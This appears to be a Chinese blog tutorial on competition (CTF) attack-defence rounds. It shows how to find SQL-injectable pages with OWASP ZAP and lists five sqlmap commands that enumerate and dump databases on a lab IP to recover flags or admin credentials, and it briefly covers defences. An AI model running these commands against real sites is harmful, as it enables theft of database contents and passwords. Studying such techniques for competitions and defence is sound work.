CTF之利用sqlmap获取后台数据

    在攻防阶段利用kali系统中的owasp zap和sqlmap工具配合使用获取网站后台数据库中数据,在攻防阶段有可能在网站数据库表中有一条数据是flag{},即数据表中有flag记录;但在挑战赛阶段若为kali环境下的挑战题目可以利用sqlmap工具实现sql注入,从而获取后台管理员登陆用户名及密码(当然也可以利用burpsuite做代理实现暴力破解获得用户名和密码,但暴力破解需要合适的字典 由于本地字典不能拷贝到比赛环境中 因此暴力破解方法在比赛中不太实用),若为windows环境下需要sql注入不可利用相关工具,此时需了解sql注入相关语句(在尝试简单sql注入之后,简单sql注入命令显示错误,此时建议放弃此sql注入的题目,因为网站对sql语句进行了相关的限制,破解此限制需不断尝试各种隐藏方法 较麻烦费事)。

    此刻的你肯定会问什么样的网页能够进行sql注入,在攻防阶段通过owasp zap扫描,在扫描结果中会出现哪些网址存在sql注入漏洞;在不利用工具的前提下往往在网址后面有类似于?id=1这样的字眼,往往说明此网址存在sql注入漏洞。 例如 http://192.168.0.11/index.php?id=1 

    至于存在sql注入漏洞的防守方法有两点:

1.直接删除存在漏洞的网站文件,防止利用其进行sql注入(比赛中推荐);

2.对存在sql注入的网站文件代码中添加sql语句的筛选过滤语句。

    下面介绍kali攻防阶段owasp zap和sqlmap配合使用,获取后台数据。

打开owasp zap输入网址即可对其扫描发现其漏洞,例如http://192.168.0.110,如下图:


在获得存在sql注入漏洞的网址后,在kali系统命令行模式下输入如下命令即可获取后台数据库中数据,就不再一一列出图片。

1.Sqlmap -u http://192.168.0.110/page.php?id=10 --dbs 显示数据库管理系统中所有数据库
2.Sqlmap -u http://192.168.0.110/page.php?id=10 --current -db 当前网站所使用得数据库
3.Sqlmap -u http://192.168.0.110/page.php?id=10 -D数据库名 --tables 显示当前数据库中所有数据表
4.Sqlmap -u http://192.168.0.110/page.php?id=10 -D 数据库名 -T表名 --columns 显示表中所有得字段名
5.Sqlmap -u http://192.168.0.110/page.php?id=10 -D 数据库名 -T表名 -C 字段名,字段名,字段名...(互相用逗号隔开) --dump 显示数据

通过上述五步即可获取并显示数据库中数据,依次查找看是否存在flag数据。

  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值